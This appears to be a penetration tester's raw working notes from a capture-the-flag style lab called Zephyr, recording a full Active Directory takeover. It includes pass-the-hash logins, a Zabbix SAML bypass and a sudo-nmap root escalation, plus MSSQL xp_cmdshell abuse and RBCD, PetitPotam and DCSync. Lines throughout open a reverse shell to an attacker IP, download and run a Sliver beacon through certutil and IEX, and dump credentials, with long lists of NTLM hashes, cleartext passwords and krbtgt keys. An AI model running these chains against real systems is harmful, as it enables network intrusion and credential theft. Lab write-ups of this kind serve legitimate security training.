192.168.110.53

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8af1903d3c80d3552a84b6ba296db2ea james@192.168.110.53


C:\Users\Administrator\Desktop>type flag.txt
ZEPHYR{P3r5isT4nc3_1s_k3Y_4_M0v3men7} :persistence


cme smb 192.168.110.53 -u James -H 8af1903d3c80d3552a84b6ba296db2ea --local-auth --put-file WESTERN_DRUM.exe WESTERN_DRUM.exe 


Import-Module .\powerview.ps1

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Set-DomainUserPassword -Identity blake -AccountPassword $UserPassword -Verbose

getST.py -spn 'cifs/dc.painters.htb' -impersonate 'Administrator' -dc-ip 192.168.110.55 -hashes :2b576acbe6bcfda7294d6bd18041b8fe 'painters.htb/blake'

export KRB5CCNAME=Administrator.ccache
wmiexec.py 'painters.htb/Administrator@dc.painters.htb' -no-pass -k


secretsdump.py -k dc.painters.htb

evil-winrm -i 192.168.110.55 -u Administrator -H 5bdd6a33efe43f0dc7e3b2435579aa53
evil-winrm -i 192.168.110.54 -u blake -p Password123!



.51

sudo su on .51 (matt -> root):

Matt: L1f30f4Spr1ngCh1ck3n!


matt@mail:~$ sudo su
root@mail:/home/matt# ls
root@mail:/home/matt# cd /root
root@mail:~# ls
flag.txt  scripts
root@mail:~# cat flag.txt
ZEPHYR{L34v3_N0_St0n3_Un7urN3d} :Back Tracking
root@mail:~# 

.55 (note: the first Administrator entry below, NT hash 5e3c0abb…, is identical to painters.htb\Matt's hash further down — the same password is reused; the second, 5bdd6a33…, is the one used for the evil-winrm login above)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
 
 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b59ffc1f7fcd615577dab8436d3988fc:::
riley:1106:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
blake:1107:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
gavin:1108:aad3b435b51404eeaad3b435b51404ee:cb8ec920398da9fbb7c33b7b613b28d5:::
daniel:1109:aad3b435b51404eeaad3b435b51404ee:b084c663ad3f214e516e6f89c81c80d7:::
tom:1110:aad3b435b51404eeaad3b435b51404ee:dc51a409ab6cf835cbb9e471f27d8bc6:::
web_svc:1111:aad3b435b51404eeaad3b435b51404ee:502472f625746727fa99566032383067:::
painters.htb\Matt:4101:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5869ab656006ee71af41d437a6788093:::
PNT-SVRSVC$:1103:aad3b435b51404eeaad3b435b51404ee:c206d294c947cecc0e60955004ff96c5:::
PNT-SVRBPA$:1104:aad3b435b51404eeaad3b435b51404ee:2dfcebbe9f5f4cb3bf98032887b3d7b6:::
PNT-SVRPSB$:1105:aad3b435b51404eeaad3b435b51404ee:7fc6b6b4b44a96617b5829a888b5a85a:::
MAINTENANCE$:2101:aad3b435b51404eeaad3b435b51404ee:fa8cde2a742ad8f6eb16e3d4bd5ed80b:::
WORKSTATION-1$:2103:aad3b435b51404eeaad3b435b51404ee:9ab46ef513f6f74ddf1ab492b8f542fa:::
ZSM$:2102:aad3b435b51404eeaad3b435b51404ee:eb6049eb57ae1ac50844b2ab2c73114e:::
 
painters.htb\Matt:CLEARTEXT:L1f30f4Spr1ngCh1ck3n!
 
 
 
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
ZEPHYR{P41n73r_D0m41n_D0m1n4nc3} :Domination
 
 

Hosts in 192.168.210.0/24 that are pingable and reachable with cme from .55:

192.168.210.10: True
192.168.210.11: True
192.168.210.12: True
192.168.210.14: True
192.168.210.15: True
192.168.210.16: True

.52

**psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:502472f625746727fa99566032383067 web_svc@192.168.110.52**

ZEPHYR{S3rV1c3_AcC0Un7_5PN_Tr0uBl35} :Disclosure

.56

evil-winrm -i 192.168.110.56 -u riley -p P@ssw0rd 
ZEPHYR{PwN1nG_W17h_P4s5W0rd_R3U53} : recycled

Ping sweep of 192.168.210.0/24 (note in the cme output below that SMB signing is False on .11/.12/.14/.15 — NTLM relay candidates — and enforced only on the DCs .10 and .16):

 
192.168.210.10: True
 
192.168.210.12: True
192.168.210.13: True
 
192.168.210.16: True
 
└─$ cme smb 192.168.210.10-20
SMB         192.168.210.10  445    ZPH-SVRDC01      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRDC01) (domain:zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.11  445    ZPH-SVRMGMT1     [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRMGMT1) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB         192.168.210.12  445    ZPH-SVRCA01      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCA01) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB         192.168.210.15  445    ZPH-SVRSQL01     [*] Windows 10.0 Build 17763 x64 (name:ZPH-SVRSQL01) (domain:zsm.local) (signing:False) (SMBv1:False)
SMB         192.168.210.16  445    ZPH-SVRCDC01     [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCDC01) (domain:internal.zsm.local) (signing:True) (SMBv1:False)
SMB         192.168.210.14  445    ZPH-SVRADFS1     [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRADFS1) (domain:zsm.local) (signing:False) (SMBv1:False)
 

.54

Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
 
Obtained via blake (evil-winrm to .54 with the reset password Password123!):
 
 
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
ZEPHYR{7h3_Tru57_h45_B3eN_Br0k3n} :Heartbreak
 
 
 
 
 

210.13

go run poc.go check -t https://192.168.210.13:443 -u Admin
 
 
[INFO] 2023/09/18 14:12 vul exist! target: https://192.168.210.13:443, cookie: eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiODc1OWFjZDhhZmExZDdkN2FlNmM0ZGY5MmE1NzgwZTAiLCJzaWduIjoidEQ3WjBTMkd5NHNjTmVuTWJ3QmVWdkZwVXRDc25JVmlQZ3FuZG9SN1BVQkY2aldabVJ1eTJwUitBRkI4SnFub0ltV1NrMEx4WTVoZHBXQlpkbDZacWc9PSJ9
 

Decoding the cookie gives `{"saml_data":{"username_attribute":"Admin"},"sessionid":…,"sign":…}` — the PoC forges the SAML session data so the username attribute is trusted without a real SSO login (Zabbix SAML SSO authentication bypass; the host is identified as a Zabbix server further below). Set this value as the SSO session cookie in the browser to land on the dashboard as Admin.

# Root via `sudo nmap`: NSE scripts are Lua, and os.execute runs with nmap's privileges (root here because of sudo).
# Write a one-line script to a temp file and have nmap execute it -> mkfifo reverse shell to the attack box on 53.
TF=$(mktemp) && echo 'os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.9 53 >/tmp/f")' >$TF && sudo nmap --script=$TF

# Attacker-side listener; start it before running the line above.
nc -lvnp 53

/root/desktop
cat flag.txt
ZEPHYR{Abu51ng_d3f4ul7_Func710n4li7y_ftw} : Monitored


? (192.168.210.16) at 00:50:56:b9:58:7d [ether] on eth0
? (192.168.210.14) at 00:50:56:b9:11:b9 [ether] on eth0
? (192.168.210.10) at 00:50:56:b9:b9:4a [ether] on eth0
? (192.168.210.17) at 00:50:56:b9:79:b4 [ether] on eth0
? (192.168.210.15) at 00:50:56:b9:bc:fb [ether] on eth0
? (192.168.210.12) at 00:50:56:b9:b1:e1 [ether] on eth0
? (192.168.210.11) at 00:50:56:b9:1c:3e [ether] on eth0
? (192.168.210.18) at 00:50:56:b9:ae:dd [ether] on eth0
user     = debian-sys-maint
password = cK8y5D1ydIXX3VCI
 
 
root:$6$6f6giSmZBJf/.sxX$lxLJK6FwdiiKgWo593xCjV0yi2U29AU5d2v2tYLrnN8AoBKswgvSuQwKiUhSb3nEcDa4sbMTu2N/TRd304bgg0:19334:0:99999:7:::
 
 
find / -name zabbix* 2>/dev/null 
cat /usr/local/etc/zabbix_server.conf
 
 
 
DBName=zabbix

### Option: DBSchema
#	Schema name. Used for PostgreSQL.
#
# Mandatory: no
# Default:
# DBSchema=

### Option: DBUser
#	Database user.
#
# Mandatory: no
# Default:
# DBUser=

DBUser=zabbix

### Option: DBPassword
#	Database password.
#	Comment this line if no password is used.
#
# Mandatory: no
# Default:

DBPassword=rDhHbBEfh35sMbkY
 
 
 
 
 
 
 
 
$2y$10$dHMYveVV/xZoM5sc9cPHGe4xUukdyOM91C.LJ8TrpRQA3s1eXhm4.
 
 
 
└─$ hashcat -m 3200 marcus_hash --show                          
$2y$10$dHMYveVV/xZoM5sc9cPHGe4xUukdyOM91C.LJ8TrpRQA3s1eXhm4.:!QAZ2wsx
 
 
 
 

Enumeration — the Zabbix DB password is reused for the domain account internal.zsm.local\zabbix (see the [+] line below); the host also exposes the writable shares loot and PublicShare:

└─$ cme smb 192.168.210.18 -u 'zabbix' -p 'rDhHbBEfh35sMbkY' --shares
SMB         192.168.210.18  445    ZPH-SVRCSUP      [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRCSUP) (domain:internal.zsm.local) (signing:False) (SMBv1:False)
SMB         192.168.210.18  445    ZPH-SVRCSUP      [+] internal.zsm.local\zabbix:rDhHbBEfh35sMbkY 
SMB         192.168.210.18  445    ZPH-SVRCSUP      [*] Enumerated shares
SMB         192.168.210.18  445    ZPH-SVRCSUP      Share           Permissions     Remark
SMB         192.168.210.18  445    ZPH-SVRCSUP      -----           -----------     ------
SMB         192.168.210.18  445    ZPH-SVRCSUP      ADMIN$                          Remote Admin
SMB         192.168.210.18  445    ZPH-SVRCSUP      C$                              Default share
SMB         192.168.210.18  445    ZPH-SVRCSUP      IPC$            READ            Remote IPC
SMB         192.168.210.18  445    ZPH-SVRCSUP      loot            READ,WRITE      
SMB         192.168.210.18  445    ZPH-SVRCSUP      PublicShare     READ,WRITE  

210.15 MSSQL login — the Zabbix DB password is accepted for zsm.local\zabbix on the SQL instance too (reuse); then impersonate sa for xp_cmdshell:

impacket-mssqlclient zsm.local/zabbix:rDhHbBEfh35sMbkY@192.168.210.15 
 
 
exec_as_login sa
 
SQL (sa  dbo@zabbix_hosts)> xp_cmdshell whoami
output                   
----------------------   
nt service\mssqlserver   
 
 
 
port 53 — stage payloads from the attack box over ports 53/443 (presumably because other outbound ports are filtered):
 
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.9:443/large1.ps1") | powershell -noprofile'
generate beacon --http 10.10.14.9 --os windows --save .


EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.9:53/WESTERN_DRUM.exe C:\Users\Public\Documents\WESTERN_DRUM.exe'

EXEC xp_cmdshell 'C:\Users\Public\Documents\WESTERN_DRUM.exe'

sliver (WESTERN_DRUM) > certify find /vulnerable



For newer Windows builds: SeImpersonatePrivilege abuse with PetitPotato (the SQL service above runs as `nt service\mssqlserver`):

https://github.com/wh0amitz/PetitPotato/releases/tag/v1.0.0



sliver (WESTERN_DRUM) > hashdump

[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ac325190bb999ef4ad73b0b67e8e33c:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::

	 * Username : ZPH-SVRSQL01$
	 * Domain   : ZSM
	 * NTLM     : ecf68b5e132ca80e6864215d5fcbba03
	 * SHA1     : bf1dfc13aaccdc957bb5246c19610667a88bfd60
 

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7ac325190bb999ef4ad73b0b67e8e33c Administrator@192.168.210.15


PS C:\Users\Administrator\Desktop> cat flag.txt
cat flag.txt
ZEPHYR{SQLi_2_Imp3rs0n4710n_fun} :The Statement
PS C:\Users\Administrator\Desktop> pwd
pwd

Path                          
----                          
C:\Users\Administrator\Desktop


cme smb 192.168.210.16 -u 'Administrator' -H 5bdd6a33efe43f0dc7e3b2435579aa53 -d painters.htb -M petitpotam


PETITPOT... 192.168.210.16  445    ZPH-SVRCDC01     VULNERABLE
PETITPOT... 192.168.210.16  445    ZPH-SVRCDC01     Next step: https://github.com/topotam/PetitPotam

Pingable hosts from .15 — two sweep variants (bash and PowerShell):

# Bash sweep of the /24: each ping is backgrounded in a subshell, so the loop returns before all replies arrive —
# give it a moment before reading the "bytes from" lines.
for i in {1..254};do (ping -c 1 192.168.210.$i | grep "bytes from" &);done

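# PowerShell sweep of the /24: valid host octets are 1..254 (.255 is the broadcast address and .256 is not a
# valid octet — the original 1..256 range included both). -quiet prints True/False per host.
1..254 | % {"192.168.210.$($_): $(Test-Connection -count 1 -comp 192.168.210.$($_) -quiet)"}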


192.168.210.10: True
192.168.210.12: True
192.168.210.13: True
192.168.210.15: True
192.168.210.16: True
192.168.210.19: True

Changing jamie's password as marcus via PowerView (marcus presumably holds a password-reset right over jamie — confirm in BloodHound):

 
Import-Module ./powerview.ps1
 
$SecPassword = ConvertTo-SecureString '!QAZ2wsx' -AsPlainText -Force
 
$Cred = New-Object System.Management.Automation.PSCredential('zsm.local\marcus', $SecPassword)
 
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
 
Set-DomainUserPassword -Identity jamie -AccountPassword $UserPassword -Credential $Cred -Verbose
 

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('zsm.local\jamie', $SecPassword)

Add-DomainGroupMember -Identity 'CA MANAGERS' -Members 'jamie' -Credential $Cred -Verbose

CA: abuse GenericAll held by a group over the CA computer object (ZPH-SVRCA01$) for RBCD — add a machine account and write msDS-AllowedToActOnBehalfOfOtherIdentity with impacket-rbcd, or manually with PowerView (there `$SDBytes` must first be built from `$ComputerSid`; it is undefined as written below):

impacket-addcomputer -method SAMR -computer-pass 'Summer2018!' -computer-name attackersystem 'zsm.local/jamie:Password123!'

impacket-rbcd -delegate-from 'attackersystem' -delegate-to 'ZPH-SVRCA01$' -action 'write' 'zsm.local/jamie:Password123!'


$ComputerSid = Get-DomainComputer ATTACKERSYSTEM$ -Properties objectsid | Select -Expand objectsid
Get-ObjectAcl -DistinguishedName "CN=ZPH-SVRCA01,CN=Computers,DC=zsm,DC=local" -ResolveGUIDs | Where-Object { $_.IdentityReference -eq "zsm.local\CA Managers" -or $_.IdentityReference -eq "zsm.local\ca_svc" }

Get-DomainComputer ZPH-SVRCA01.zsm.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

210.11

└─$ certipy shadow auto -username marcus@zsm.local -p '!QAZ2wsx' -account ZPH-SVRMGMT1$ -dc-ip 192.168.210.10 -debug
 
 
pth-net rpc group addmem "General Management" "ca_svc" -U zsm.local/ZPH-SVRMGMT1\$%"ffffffffffffffffffffffffffffffff":"89d0b56874f61ad38bad336a77b8ef2f" -S 192.168.210.10
 
impacket-secretsdump 'zsm.local/jamie:Password123!@192.168.210.11'
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x90c9f7848607977407f9afabdb3cfcc0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:545c503123664e5713439e088bd91035:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a58eed2cff6a92dd8d2d5b9116be4f:::
Waka:1000:aad3b435b51404eeaad3b435b51404ee:540e425b08537ae30e53b5d4c123385e:::
[*] Dumping cached domain logon information (domain/username:hash)
ZSM.LOCAL/Administrator:$DCC2$10240#Administrator#04a13c983d1c6f2ee43cc9aa0c4d49c6: (2023-05-19 08:27:18)
ZSM.LOCAL/marcus:$DCC2$10240#marcus#66dddfc25df0d824e30c55a9ecccb512: (2023-09-19 04:32:12)
ZSM.LOCAL/jamie:$DCC2$10240#jamie#8eaa1e87b84f7197df2b836fae8e5c3c: (2022-10-28 12:56:42)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ZSM\ZPH-SVRMGMT1$:aes256-cts-hmac-sha1-96:937391acdbd6a5f63cf0f6700ac25aba7c8d747bcdd437f5efb419a12d8995c7
ZSM\ZPH-SVRMGMT1$:aes128-cts-hmac-sha1-96:d73da5795d36d46bf61b1afb40b247f5
ZSM\ZPH-SVRMGMT1$:des-cbc-md5:46620bf237cb1568
ZSM\ZPH-SVRMGMT1$:plain_password_hex:a59ff2202125f08774455a23ac8e623130743053e98d29eea3234cf4995bc3040b3e86e68c4ce7d681da4614f3b4d6066ce96a1a0257a1dca1221f864fcaf05f617d53ff9e6e7e8afedf8e4e70dd793440a6203fc780bbae017e795f3002958340850257b1caff49bcb045a861c67631dfb7f0ac6525ec72a9fd35035bfa1cb79578a785c08140a10abe5b756c2bcaa06ae1dceb3fe0f315a793c66aeaf35558deafd3d3796674de82fb98ba41878356fdde5ab8fc89dfe8a67c34015d64f03f52d515684b07c1bc9108daa73c6a63f49bf32e6403f850ae7d56ca6f2c49ca82fe414f14c100a2fb7cc901a2f07c52dc
ZSM\ZPH-SVRMGMT1$:aad3b435b51404eeaad3b435b51404ee:89d0b56874f61ad38bad336a77b8ef2f:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x05341d094f374bb97fd82b3a19619bbc3d28e967
dpapi_userkey:0xc4de07634653cdeda95b1baea5a86ceaa9683003
[*] NL$KM 
 0000   95 E8 38 F2 47 8A 41 12  A5 77 CA 0A 23 E6 56 28   ..8.G.A..w..#.V(
 0010   85 56 73 10 A9 49 99 6A  B5 5D FB C5 AD B4 4C 76   .Vs..I.j.]....Lv
 0020   3A 07 D8 40 73 ED EE 03  28 5E A6 02 7E 09 38 EA   :..@s...(^..~.8.
 0030   48 55 7F 6D 9C FD 9A 8B  C1 F1 F4 D7 0A 6F 3B D0   HU.m.........o;.
NL$KM:95e838f2478a4112a577ca0a23e6562885567310a949996ab55dfbc5adb44c763a07d84073edee03285ea6027e0938ea48557f6d9cfd9a8bc1f1f4d70a6f3bd0
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
 
 
																
 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:545c503123664e5713439e088bd91035 Administrator@192.168.210.11
 
net group "General Management" marcus /add /domain
 
 
 
 
certutil -urlcache -split -f http://10.10.17.10:53/SENSIBLE_CODE.exe
 
PS C:\Users\Administrator\Desktop> type flag.txt
type flag.txt
ZEPHYR{K3y_Cr3d3n714l_l1nk_d4ng3r} :Diverted
 
  [+] Host File(T1016)
    192.168.210.17 zephyr.bamboohr.htb
    192.168.210.18 zephyr.atlassian.htb
 
 
URL:
Login: melissa
Password: WinterIsHere2022!
# 210.16
 
 
python3 PetitPotam.py -u mssql_svc -p 'ToughPasswordToCrack123!' -d internal.zsm.local -dc-ip 192.168.210.16 10.10.17.66 192.168.210.16
 
 
 
 
 
[SMB] NTLMv2-SSP Client   : 10.10.110.35
[SMB] NTLMv2-SSP Username : internal\ZPH-SVRCDC01$
[SMB] NTLMv2-SSP Hash     : ZPH-SVRCDC01$::internal:d1c4901af08557de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

bloodhound-python collection (melissa is an internal.zsm.local account per the smbclient.py line below, so `-d internal.zsm.local` is the matching domain for that run):

bloodhound-python -u jamie -p 'Password123!' -ns 192.168.210.10 -d zsm.local -c all --dns-tcp --zip

bloodhound-python -u melissa -p 'WinterIsHere2022!' -ns 192.168.210.16 -d zsm.local -c all --dns-tcp --zip

bloodhound-python -u matt -p 'L1f30f4Spr1ngCh1ck3n!' -ns 192.168.110.55 -d painters.htb -c all --dns-tcp --zip

210.16

cme smb 192.168.210.16 -u 'melissa' -p 'WinterIsHere2022!' --shares

smbclient.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16






└─$ reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' backup -o '\\10.10.14.4\exegol'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SAM to \\10.10.14.4\exegol\SAM.save
[*] Saved HKLM\SYSTEM to \\10.10.14.4\exegol\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.10.14.4\exegol\SECURITY.save



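# Export SAM/SYSTEM/SECURITY to an attacker-hosted SMB share for an offline secretsdump. All three use the
# `save` subcommand (the original first line used `query`, which reads the key instead of exporting the hive).
# melissa being able to export these hives remotely implies elevated rights on this DC (e.g. Backup Operators)
# — worth confirming in BloodHound.
reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' save -keyName 'HKLM\SAM' -o '\\10.10.14.4\share'
reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.4\share'
reg.py 'internal.zsm.local/melissa:WinterIsHere2022!@192.168.210.16' save -keyName 'HKLM\SECURITY' -o '\\10.10.14.4\share'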

Offline secretsdump of the saved hives (note the local Administrator NT hash 5bdd6a33… matches the painters.htb Administrator hash dumped earlier — the same password is reused across both domains):

 impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY LOCAL 

*] Target system bootKey: 0xb1223a009047a376c120c3630a0f0e48
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:dc66f30d3e8bd48b4bfb9c3f53eb66ebda1edbb7af476a9f7650476edce03326b61fabe212dfd9e6c2e06eaaffcab3c78cfd4f47cd564ef53e8eb5d855f9e998c34c5fabc5e713559e090d6e5dc149a97ed653608d5cd07864d7774f2d766512849d4fafff4030324173ccd8cb8c6a1513a348a337c6d46778e4e37bc2e2c2e369626f1f153bdf391f8c175fdae042537016a2198b8c120c738854c907a1ddddcb88aaa517af97bcee783d1d9a36ddc179f2bb5cc8a336a00863183c96384434bb9a8eee781822f51d2727cd14e3fd0841edfa7004eefa2a8e3327b457f34587642e1e91e79a24590d97b8ad6cb14ee7
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf108ba9fcd3554a2abb82ff4a8d29f0679aeaae6
dpapi_userkey:0xe57f2322d588ce987f04d6a3b1bf31cfa35d050a
[*] NL$KM 
 0000   07 E9 F2 3F 08 49 46 07  02 CE 30 4B 65 D3 86 32   ...?.IF...0Ke..2
 0010   6F 02 5D 36 7D E8 30 33  F4 71 94 44 98 37 CB 1A   o.]6}.03.q.D.7..
 0020   05 CC 76 F1 26 E2 94 E7  D3 54 78 1F EF BE E9 13   ..v.&....Tx.....
 0030   30 3B 62 CB A5 57 75 E6  78 F3 D4 55 5C 68 20 15   0;b..Wu.x..U\h .
NL$KM:07e9f23f0849460702ce304b65d386326f025d367de83033f47194449837cb1a05cc76f126e294e7d354781fefbee913303b62cba55775e678f3d4555c682015
[*] Cleaning up...
 
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SAM' -o 'C:'
 
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o 'C:'
 
reg.py internal.zsm.local/melissa:'WinterIsHere2022!'@192.168.210.16 save -keyName 'HKLM\SECURITY' -o 'C:'
 
 
smbclient.py -U melissa \\192.168.210.16\c$
 
 
get SAM.save
get SECURITY.save
get SYSTEM.save
 
 
Finally, run Impacket's secretsdump against the saved hives offline to extract the hashes:
 
impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
 
 
After several days of struggling I came across an article describing a DCSync with the domain controller's machine account. The ZPH-SVRCDC01$ NT hash (d47a6d90…) is the $MACHINE.ACC secret from the offline secretsdump above; a DC's computer account holds the replication rights DRSUAPI needs, so it can pull every NTDS secret:
 
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948 -just-dc internal.zsm.local/ZPH-SVRCDC01\$@192.168.210.16
 
└─$ secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948 -just-dc internal.zsm.local/ZPH-SVRCDC01\$@192.168.210.16
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::
internal.zsm.local\mssql_svc:6101:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Emily:6601:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Laura:6602:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Melissa:6603:aad3b435b51404eeaad3b435b51404ee:184260f5bf16a77d67a9d540fda79495:::
internal.zsm.local\Sarah:6604:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Amy:6605:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Steven:6606:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Malcolm:6607:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Aron:6608:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Matt:6609:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Jamie:6610:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
smith:17601:aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f:::
ZPH-SVRCDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
ZPH-SVRCHR$:1601:aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e:::
ZPH-SVRCSUP$:1602:aad3b435b51404eeaad3b435b51404ee:36e7d551e7cb15ca7dad3fd851fc707f:::
ZSM-SVRCSQL02$:5601:aad3b435b51404eeaad3b435b51404ee:ad854719bbb6fc1664316a14cc6eb88d:::
INT-MAINT$:6102:aad3b435b51404eeaad3b435b51404ee:8c0aff2e562402c147dc9650b1eb86cb:::
ZSM$:1103:aad3b435b51404eeaad3b435b51404ee:91d02ffbd6ca69bfb36bac9bd679bac1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:ab4d5bbcb88a9344fbdfee0f8ad5825d043d41bd36743d95d0ec410b43b8f35d
Administrator:aes128-cts-hmac-sha1-96:7fe65b32357f19c0d5cf95675e789f00
Administrator:des-cbc-md5:6e3db9041a64803d
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16
internal.zsm.local\mssql_svc:aes256-cts-hmac-sha1-96:bea9de16d6775f6ed646cf8e002b2e6845e219f080a709410cb600f909d105ff
internal.zsm.local\mssql_svc:aes128-cts-hmac-sha1-96:4df91cf757b8cb7c5f6e544236293c8d
internal.zsm.local\mssql_svc:des-cbc-md5:5bdf199ee546e6f8
